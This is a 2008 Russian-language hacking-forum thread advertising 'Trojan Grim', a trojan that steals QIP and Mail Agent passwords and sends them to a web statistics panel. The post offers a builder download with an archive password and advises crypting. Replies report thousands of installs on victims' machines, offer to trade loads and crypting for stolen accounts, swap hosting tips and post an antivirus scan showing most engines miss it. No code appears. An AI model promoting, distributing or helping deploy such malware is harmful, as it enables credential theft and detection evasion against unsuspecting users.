• XSS.stack #1 – первый литературный журнал от юзеров форума

Trojan Grim

Отслеживать
Noctambulaar

Noctambulaar

(L3) cache
Пользователь
Регистрация
06.06.2008
Сообщения
257
Реакции
5
::[ Trojan Grim ver.0.5 ]::

Description: Троян высылает пароли от QIP, QIP Infium, Mail Agent даже если пароль не сохраняется.

Soft:
[ + ] Поддерживает QIP: 7981, 7990, 7995, 7997, 7998, 8000 - 8070
[ + ] Поддерживает QIP Infium: 8000 - 9017
[ + ] Поддерживает Mail Agent: 3.0 - 5.2

Web-gate:
[ + ] Есть веб-стата и парсер. Скрины ниже.

Info:
[ + ] Скрытая работа. Обход фаерволов.
[ + ] Размер: 26 kb, После паковки: 12 kb.

Author:
Noctambulaar

Date:
14.10.2008 (последнее обновление).

Download:
Стата, билдер, парсер: [скачать] | password: grim

Ps: (конечно же нужна криптовка).

Builder::
pictgr.jpg


Web-State::
grim1.jpg


Parser::
grim2.jpg
 
Как проверить:

1) Запускаем билд трояна
2) Логинимся к квип
3) Ждем 2 минуты, квип должен быть активен
4) Смотрим в стату

Noctambulaar (16:42:37 14/10/2008)
Ну смотри, грим сам не посылает пакеты, посылает ехплорер

7376579 (16:43:18 14/10/2008)
это понятно. такой же принцип как в пинче. Значит эксплорер надо проверить мой

7376579 (16:46:23 14/10/2008)
странно. эксплорер работает. версия 7. Наверное сейчас на каких-нибудь знакомых проверю


7376579 (17:41:57 14/10/2008)
всё. получилось. Это у меня с компа почему-то не идет, а у остальных норм шлёт

Noctambulaar (17:43:23 14/10/2008)
Выслало пасс?

7376579 (17:43:32 14/10/2008)
да. всё норм

7376579 (17:43:45 14/10/2008)
спс за троя.

Noctambulaar (17:43:53 14/10/2008)
 
честно говоря его скрытность под большим вопросом.
в такс манаджере появляется процесс, с названием иконки.

как обход фаеров не знаю, так как не использую.

минут 5-10 как жду отчеты.

тестил гип инфиум, и 8070.
 
Предлагаю устроить тестирование троя.
Loney Wolf что скажешь?

Предлагаю с тебя загрузки и крипт. С меня хост и статья с отзывом.
p.s. Все найденные уины - твои.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Предлагаю устроить тестирование троя.
Loney Wolf что скажешь?

Предлагаю с тебя загрузки и крипт. С меня хост и статья с отзывом.
p.s. Все найденные уины - твои.
Я его уже 3-ий раз ставлю на прогруз больше 15 логов ещё не видел, а загрузок примерно 3к уже было в общей сумме ))))
 
На некоторых хостингах могут возникнуть проблемы, у некоторых возникают на "phpnet.us", где так же, как и у пинча, бывает не высылает пасс в стату. Пробовал на axer.ru, хостинг за 15 рублей, там все нормально.

зеркало

ps: что-то да, из-за разных отзывов всё ушло в паблик, устал настраивать и выслушивать.

1) не у всех данный софт \\ траф ру
2) возможно дело в хосте
3) нужно время

ps: 15 акков пришло?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ps: 15 акков пришло?
С последнего билда сейчас уже больше 1к прогрузов 0 пришло, со старого приходит.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Не понимаю, зачем разные билды создавать? Ты создал 3 билда разных и грузишь?
Ну ты мне 3 версии давал пока дорабатывал, первую билд выдал, вторую тоже билд был ещё, а щас билдер дал.
Вот со второго или первого логи идут, с последнего нет.
Добавлено в [time]1223990661[/time]
Возможно после крипта не работает, не проверял.
 
Запусти, у людей работает.

A-Squared Found nothing
AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found BehavesLike:Win32.Malware (probable variant)
ClamAV Found nothing
CPsecure Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found W32/Heuristic-119!Eldorado (probable variant)
F-Secure Anti-Virus Found nothing
G DATA Found nothing
Ikarus Found Trojan.Delf.NEB
Kaspersky Anti-Virus Found nothing
NOD32 Found probably unknown NewHeur_PE (probable variant)
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Sophos Antivirus Found Sus/Dropper-R (probable variant)
VirusBuster Found nothing
VBA32 Found nothing
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх